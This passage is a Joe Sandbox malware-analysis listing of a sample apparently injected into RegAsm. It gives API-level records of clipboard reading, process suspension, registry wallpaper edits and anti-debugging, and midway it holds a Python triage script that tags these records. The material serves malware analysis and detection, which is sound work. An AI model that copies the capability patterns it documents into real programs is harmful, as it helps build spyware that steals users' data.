                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FileFind$FirstNextsend
                                                          • String ID: XPG$XPG
                                                          • API String ID: 4113138495-1962359302
                                                          • Opcode ID: 8ec9f0cc365a37df7811e5b4f0ae14501dc80df39e96773c8ea2da6c59a756f9
                                                          • Instruction ID: 6b6d716c6ecdfe6ec78918620e47e684a121d368db73a1555a51ac38f2ecb6eb
                                                          • Opcode Fuzzy Hash: 8ec9f0cc365a37df7811e5b4f0ae14501dc80df39e96773c8ea2da6c59a756f9
                                                          • Instruction Fuzzy Hash: 212195325083419BC314FB61D855DEFB3ACAF90358F40493EF696621E1EF78AA09C65B
                                                          APIs
                                                          • SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041CAD7
                                                            • Part of subcall function 0041376F: RegCreateKeyA.ADVAPI32(80000001,00000000,?), ref: 0041377E
                                                            • Part of subcall function 0041376F: RegSetValueExA.KERNEL32(?,004674B8,00000000,?,00000000,00000000,004752F0,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137A6
                                                            • Part of subcall function 0041376F: RegCloseKey.KERNEL32(?,?,?,0040F853,004674B8,5.1.0 Pro), ref: 004137B1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseCreateInfoParametersSystemValue
                                                          • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                                                          • API String ID: 4127273184-3576401099
                                                          • Opcode ID: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction ID: 1197cbbb31bb874c57b9e92d70abebba424d259215afdbf251ae70ffa4d9d73d
                                                          • Opcode Fuzzy Hash: 4f71dd23c4f760eabc23ec2adbc3392ecf1bb7076945bb966ce08e22b16a15c0
                                                          • Instruction Fuzzy Hash: 7B1184B2BC021473D419313E5DABBBE28029743B51F94416BF6123A6C6E8DF0A8102CF
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 00448274
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 00448281
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452117
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452168
                                                          • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00452228
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorInfoLastLocale$_free$_abort
                                                          • String ID:
                                                          • API String ID: 2829624132-0
                                                          • Opcode ID: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction ID: 4b80d7ab7a7ff47978e382ad652e238d088576b56b9f239e8998609391b98480
                                                          • Opcode Fuzzy Hash: b894af2e73636fd6e8af7e748ba09ab431642972e93d3e8eb2aea65845f920f8
                                                          • Instruction Fuzzy Hash: B961C1315006079BDB289F25CE82BBB77A8FF05306F1041ABED15C6642F7B89D89DB58
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32 ref: 0043BC1A
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0043BC24
                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 0043BC31
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction ID: cbfc558a7ca4bb69983b526de44ffd1abc81b2e56a4044740c9350c1ecaeaada
                                                          • Opcode Fuzzy Hash: a72bbe9f24da65e63e608425843f2cf14cbf2294963ef3e60e5c7cfd459546ed
                                                          • Instruction Fuzzy Hash: E131C27590121DABCB21DF65DD89BCDBBB8AF08311F5051EAE80CA6251EB349F858F48
                                                          APIs
                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 100061DA
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 100061E4
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 100061F1
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                          • String ID:
                                                          • API String ID: 3906539128-0
                                                          • Opcode ID: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction ID: da4494ed88e82f72bec2981ffd8ad716d5acf317cb547f21db02b9c2842d332f
                                                          • Opcode Fuzzy Hash: 9058010cd15fc66324dfcb9f974f53c8d28613eb360f6b8a0023823f9da020d8
                                                          • Instruction Fuzzy Hash: 4A31D37490122C9BEB21DF24DD88B8DBBB8EF08350F5041DAE81CA7265E7709F818F55
                                                          APIs
                                                          • CryptAcquireContextA.ADVAPI32(00000000,00000000,00000000,00000001,F0000000,?,00000000,004334BF,00000034,?,?,00F6E048), ref: 00433849
                                                          • CryptGenRandom.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000), ref: 0043385F
                                                          • CryptReleaseContext.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,?,00433552,00000000,?,00000000,0041E251), ref: 00433871
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                          • String ID:
                                                          • API String ID: 1815803762-0
                                                          • Opcode ID: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction ID: 864202151b2ab8ebdb17250bb7e2999cce5b6c404a207f59f2405eb254ca80c1
                                                          • Opcode Fuzzy Hash: 81ae4bbc27a0383ddd18646ed4cc5f88ed8aa0b0f15284250c3048956b898281
                                                          • Instruction Fuzzy Hash: 83E09231308310FAFB341F25AC08F573AA5EB89B67F20093AF211E40E4D2568C018A5C
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
                                                          • TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
                                                          • ExitProcess.KERNEL32 ref: 004432EF
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction ID: 3be6e6b92543006147ef5d7b2afd166c5ab2c5ffe072a920593a5ac20c7500e8
                                                          • Opcode Fuzzy Hash: fda3935ef75a9da2a187ce407300f3730e4ebfece79a37869d002a8a215f2f15
                                                          • Instruction Fuzzy Hash: D6E0BF31400244FBDF126F55DD0AA993B69FB40757F044469F90946232CB7ADE42CA98
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(?,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004AD5
                                                          • TerminateProcess.KERNEL32(00000000,?,10004A8A,?,10012238,0000000C,10004BBD,00000000,00000000,00000001,10002082,10012108,0000000C,10001F3A,?), ref: 10004ADC
                                                          • ExitProcess.KERNEL32 ref: 10004AEE
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Process$CurrentExitTerminate
                                                          • String ID:
                                                          • API String ID: 1703294689-0
                                                          • Opcode ID: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction ID: 67c7ca3480f18a9b01e05da0926f82de4ad888d39fdd55e1be860e0f4a97641b
                                                          • Opcode Fuzzy Hash: 0083298fcdf57ae02ee63dbac9b2f40de16c14eb6cad1f3ac06a4de9001c4c8a
                                                          • Instruction Fuzzy Hash: 04E04676000218AFEF01BF25CD48B493B6AEF013C1F128010F9088B029CB35ED52CA68
                                                          APIs
                                                          • OpenClipboard.USER32(00000000), ref: 0040B711
                                                          • GetClipboardData.USER32(0000000D), ref: 0040B71D
                                                          • CloseClipboard.USER32 ref: 0040B725
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Clipboard$CloseDataOpen
                                                          • String ID:
                                                          • API String ID: 2058664381-0
                                                          • Opcode ID: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction ID: a9752f6e69e3a39ef1c6dae57fb9473311d117e3f10fa11c4aa70225693e5904
                                                          • Opcode Fuzzy Hash: d38c0863fa6e1407ff7c70a07519499014c38180332fc89bd075bae9f751f2b8
                                                          • Instruction Fuzzy Hash: 4FE0EC31645320EFC2209B609C49B9A6754DF95F52F41843AB905AB2D5DB78CC40C6AD
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
                                                          • NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
                                                          • CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenSuspend
                                                          • String ID:
                                                          • API String ID: 1999457699-0
                                                          • Opcode ID: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction ID: bc08a5c74f7a636e8823ed9fed2a710289fdff4cb0149baf3e3f1c1580a6a9c0
                                                          • Opcode Fuzzy Hash: 65307f06ae4da2db5a73601f3478dcd91fa25f5db04ba40a4c100ff3b6d3014e
                                                          • Instruction Fuzzy Hash: 96D05E36204231E3C32017AA7C0CE97AD68EFC5AA2705412AF804C26649B20CC01C6E8
                                                          APIs
                                                          • OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
                                                          • NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
                                                          • CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process$CloseHandleOpenResume
                                                          • String ID:
                                                          • API String ID: 3614150671-0
                                                          • Opcode ID: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction ID: 907c56f48a3137ad3e5a70bb4b43f8813844e3fa30c0a1486a2e097c633c30d6
                                                          • Opcode Fuzzy Hash: 2a3aa994b22e7efaa36e689b3453aa0ec17d897c0eb19943e791a895e5fd105b
                                                          • Instruction Fuzzy Hash: B8D05E36104121E3C220176A7C0CD97AE69EBC5AA2705412AF904C32619B20CC01C6F4
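The three records above (OpenClipboard/GetClipboardData/CloseClipboard, and OpenProcess followed by NtSuspendProcess or NtResumeProcess) are the ones worth a reviewer's attention in this listing; the GetCurrentProcess/TerminateProcess/ExitProcess and EnumSystemLocalesW/GetLocaleInfoW records are C runtime code that the plugin lists the same way. The script below is an added example, not part of Joe Sandbox or of this report: it parses API lines in the exact form printed here (with the optional "Part of subcall function" prefix) and tags each function by the API combination and argument values it contains. The tag names and rules are the author's own; 0xD (CF_UNICODETEXT) and 0x800 (PROCESS_SUSPEND_RESUME) are the documented Win32 constants. The sample text is constructed from the entries printed on this page.

```python
"""Tag the per-function "APIs" records of a Joe Sandbox IDA-plugin listing.
Added example, not Joe Sandbox code: tag names and rules are the author's own."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

PROCESS_SUSPEND_RESUME = 0x0800  # OpenProcess dwDesiredAccess bit
CF_UNICODETEXT = 0x000D          # GetClipboardData uFormat

# "• Api.MODULE(args), ref: addr", optionally prefixed "Part of subcall function X:"
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]     # raw hex strings; "?" where the plugin could not resolve
    ref: int            # call-site address
    from_subcall: bool  # True for "Part of subcall function" lines

@dataclass
class FunctionRecord:
    calls: list[ApiCall] = field(default_factory=list)

    def direct(self) -> list[ApiCall]:
        return [c for c in self.calls if not c.from_subcall]

def parse_records(text: str) -> list[FunctionRecord]:
    """An "APIs" heading opens a record; any other non-empty line closes it."""
    records, current = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            current = FunctionRecord()
            records.append(current)
            continue
        m = API_LINE.match(line)
        if m and current is not None:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
            current.calls.append(ApiCall(m["api"], m["module"], args,
                                         int(m["ref"], 16), m["sub"] is not None))
        elif line.strip():
            current = None
    return records

def _arg(call: ApiCall, index: int) -> int | None:
    try:
        return int(call.args[index], 16)
    except (IndexError, ValueError):  # absent or "?"
        return None

def triage(record: FunctionRecord) -> list[str]:
    by_name = {c.api: c for c in record.direct()}
    apis, tags = set(by_name), []
    if {"OpenClipboard", "GetClipboardData"} <= apis:
        fmt = _arg(by_name["GetClipboardData"], 0)
        tags.append("clipboard-read:CF_UNICODETEXT" if fmt == CF_UNICODETEXT
                    else f"clipboard-read:fmt={fmt}")
    if "OpenProcess" in apis and apis & {"NtSuspendProcess", "NtResumeProcess"}:
        tag = "process-suspend" if "NtSuspendProcess" in apis else "process-resume"
        access = _arg(by_name["OpenProcess"], 0)
        if access is not None and access & PROCESS_SUSPEND_RESUME:
            tag += ":PROCESS_SUSPEND_RESUME"
        tags.append(tag)
    if {"GetCurrentProcess", "TerminateProcess", "ExitProcess"} <= apis:
        tags.append("crt-abort(noise)")   # CRT abort() path, not payload logic
    if apis & {"EnumSystemLocalesW", "GetLocaleInfoW"}:
        tags.append("crt-locale(noise)")  # CRT locale initialisation
    return tags

def triage_report(text: str) -> list[tuple[str, list[str]]]:
    """(first direct call site, tags) for each record that has direct calls."""
    return [(f"{rec.direct()[0].ref:08X}", triage(rec))
            for rec in parse_records(text) if rec.direct()]

# Constructed sample: five records copied from the entries printed on this page.
SAMPLE_REPORT = """\
APIs
• OpenClipboard.USER32(00000000), ref: 0040B711
• GetClipboardData.USER32(0000000D), ref: 0040B71D
• CloseClipboard.USER32 ref: 0040B725
Memory Dump Source
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00415FFF,00000000), ref: 0041BB14
• NtSuspendProcess.NTDLL(00000000), ref: 0041BB21
• CloseHandle.KERNEL32(00000000,?,?,00415FFF,00000000), ref: 0041BB2A
APIs
• OpenProcess.KERNEL32(00000800,00000000,00000000,?,?,00416024,00000000), ref: 0041BB40
• NtResumeProcess.NTDLL(00000000), ref: 0041BB4D
• CloseHandle.KERNEL32(00000000,?,?,00416024,00000000), ref: 0041BB56
APIs
• GetCurrentProcess.KERNEL32(?,?,0044328B,?), ref: 004432D6
• TerminateProcess.KERNEL32(00000000,?,0044328B,?), ref: 004432DD
• ExitProcess.KERNEL32 ref: 004432EF
APIs
  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
• EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
"""
```

Calling triage_report(SAMPLE_REPORT) yields one (call site, tags) pair per record, e.g. ("0040B711", ["clipboard-read:CF_UNICODETEXT"]) for the clipboard function and ("0041BB14", ["process-suspend:PROCESS_SUSPEND_RESUME"]) for the suspend function, while the CRT records come back tagged as noise. Only direct calls feed the rules; "Part of subcall function" lines are kept on the record but not matched, so CRT helpers reached from a payload function do not mask its own API profile. A GetClipboardData whose format argument the plugin printed as "?" is still tagged, with fmt=None, rather than dropped.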
                                                          APIs
                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A,00000000), ref: 00434C6B
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: FeaturePresentProcessor
                                                          • String ID: MZ@
                                                          • API String ID: 2325560087-2978689999
                                                          • Opcode ID: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction ID: b6e659610939bc40af268f25ffb2b9965a4fe426cdd66f7fc4435c5297b2c53a
                                                          • Opcode Fuzzy Hash: e737252210e65bd7558355cab1b99ff1055998ec76fc21d90816c5055d8ae967
                                                          • Instruction Fuzzy Hash: EE515471D002089BEB24CF69D9856DEBBF4FB48354F24956BD819EB350D378AA80CF94
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction ID: 28de479bcd0ee174bbf7ea2f8c467f6584cf945aa63ddb2e5cfeaaf716254919
                                                          • Opcode Fuzzy Hash: 6d782d14881953f3dc1aa7198760a6549ba6db1eba9a251ec7cea06479966fa1
                                                          • Instruction Fuzzy Hash: 233106B2900149AFEB249E7ACC85EEB7BBDEF45304F1001AEE819D7291E6349D458B54
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3272380901.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000004.00000002.3272320840.0000000010000000.00000004.00001000.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3272380901.0000000010016000.00000040.00001000.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_10000000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: .
                                                          • API String ID: 0-248832578
                                                          • Opcode ID: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction ID: 9046c4836333a0efab45ea1e09b7d9ff5bbd95f87beecc7c41f4b92e1cb642f0
                                                          • Opcode Fuzzy Hash: d62ff9c274239ee522e16b5fb8162bf78a9045f13a61a74130903e5937500e37
                                                          • Instruction Fuzzy Hash: 45313771800159AFEB14CF74CC84EEA7BBEDB49384F200198F81997259E6319E448B60
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(004520C3,00000001,00000000,?,lJD,?,004526F0,00000000,?,?,?), ref: 0045200D
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction ID: 7d3ee128790e63e9d167a680a676634a6e0759605f9449bc3b94779c572ada63
                                                          • Opcode Fuzzy Hash: 8fcc83528109b8aaf498f975bbbcb34ae0404b7acadb8afce226787919ce0173
                                                          • Instruction Fuzzy Hash: E51125372007019FDB189F39C8916BABB91FF8075AB14482EEE4687B41D7B9A946CB44
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                                            • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                                            • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                                          • EnumSystemLocalesW.KERNEL32(00452313,00000001,?,?,lJD,?,004526B4,lJD,?,?,?,?,?,00444A6C,?,?), ref: 00452082
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: ErrorLast$EnumLocalesSystem_abort_free
                                                          • String ID: lJD
                                                          • API String ID: 1084509184-3316369744
                                                          • Opcode ID: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction ID: 5d4b7cb44ca553c54ae5d492338df10e7871f8ce083c0ea6e3a4370b1d871309
                                                          • Opcode Fuzzy Hash: acb24ebe04e4856a9c83d3494bcbe1da60fd92419c71b9527b23937778bf3cf5
                                                          • Instruction Fuzzy Hash: 44F0FF322003055FDB245F798881A7A7B95FB82769B14446EFE428B681D7F9AC02C604
                                                          APIs
                                                          • GetLocaleInfoW.KERNEL32(00000000,00000002,00000000,?,20001004,?,20001004,?,00000002,?,?,004444CA,?,00000004), ref: 00448940
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000004.00000002.3261739148.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000004.00000002.3261739148.0000000000474000.00000040.00000400.00020000.00000000.sdmp
                                                          • Associated: 00000004.00000002.3261739148.0000000000478000.00000040.00000400.00020000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: InfoLocale
                                                          • String ID: GetLocaleInfoEx
                                                          • API String ID: 2299586839-2904428671
                                                          • Opcode ID: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                          • Instruction ID: 280d24bb3358c3803ceca68c405fa8cd3b52f77a8ef21af096b961815111c089
                                                          • Opcode Fuzzy Hash: 2d8ab5e4c08eb423885d267f31dc3d21c73ce0c4a0b39471804a4927225e8e03
                                                          • Instruction Fuzzy Hash: D1F02B31A40308F7DB119F61DC02F7E7B15DF08751F10056EFC0926261CE399D159A9E
                                                          APIs
                                                            • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                                            • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
